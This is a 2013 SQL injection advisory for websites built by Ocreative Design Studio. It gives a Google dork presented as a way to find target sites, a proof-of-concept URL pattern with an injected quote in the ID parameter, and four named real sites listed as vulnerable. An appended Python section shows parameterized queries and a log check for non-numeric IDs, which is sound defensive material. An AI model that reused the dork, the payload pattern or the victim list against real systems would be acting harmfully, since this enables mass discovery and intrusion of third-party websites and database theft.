Thursday, 7 November 2013

Ocreative Design Studio SQL Injection Vulnerabilities



: # Exploit Title : Ocreative Design Studio SQL Injection Vulnerabilities
: # Date : 06 November 2013
: # Author : r1q
: # CMS Developer : http://www.ocreativedesign.com/
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection
: # Tested On : Google Chrome Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Cisadane, X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club,


DORKS (how to find the target sites) :
================================
intext:Web Design & Hosting by Ocreative Design Studio inurl:/?ID=

Or craft your own Google Dork however you like :)

Explanation
================

SQL Injection :
POC : http://[Site]/[Path]/?ID=[SQLi]
Examples of vulnerable sites :
http://www.downtownhartland.com/event-de...hp?ID=499'
http://www.terrastaffing.com/contact-us/...ons/?ID=6'
http://www.wcfls.org/news.php?ID=177'
http://www.citypubnationwide.com/south-f...p?ID=7797'
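
Added example (not part of the original advisory and not the vendor's code): a Python sketch showing why a trailing quote in the ID parameter breaks a query built by string concatenation, the same lookup with integer validation and a bound parameter, and an access-log check that flags non-numeric ID values. The table, function names and log lines are constructed for illustration; SQLite stands in for the site's database, and the concatenated query is an assumption about how the affected pages build their SQL.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs

def make_db():
    # Constructed sample table standing in for a site's content table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO news VALUES (177, 'Library hours')")
    return conn

def fetch_concatenated(conn, raw_id):
    # Assumed flawed pattern: the raw ID value is pasted into the SQL text,
    # so a stray quote changes the statement and the database rejects it.
    return conn.execute("SELECT title FROM news WHERE id = " + raw_id).fetchone()

def fetch_parameterized(conn, raw_id):
    # Hardened: accept only a plain integer, then bind it as a parameter.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return None
    return conn.execute("SELECT title FROM news WHERE id = ?", (int(raw_id),)).fetchone()

def suspicious_id_requests(log_lines):
    # Flag requests whose ID query parameter is not purely numeric
    # (parse_qs URL-decodes the value, so %27 is caught as well).
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
        if not m:
            continue
        params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for key, values in params.items():
            if key.lower() == "id" and any(not re.fullmatch(r"[0-9]+", v) for v in values):
                hits.append(line)
                break
    return hits

# Constructed access-log lines (documentation IP addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Nov/2013:10:00:01 +0000] "GET /news.php?ID=177 HTTP/1.1" 200 5120',
    "192.0.2.44 - - [07/Nov/2013:10:00:09 +0000] \"GET /news.php?ID=177' HTTP/1.1\" 500 312",
    '192.0.2.44 - - [07/Nov/2013:10:00:12 +0000] "GET /news.php?ID=177%27 HTTP/1.1" 500 312',
]

if __name__ == "__main__":
    db = make_db()
    print(fetch_parameterized(db, "177"), fetch_parameterized(db, "177'"))
    for hit in suspicious_id_requests(SAMPLE_LOG):
        print("review:", hit)
```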
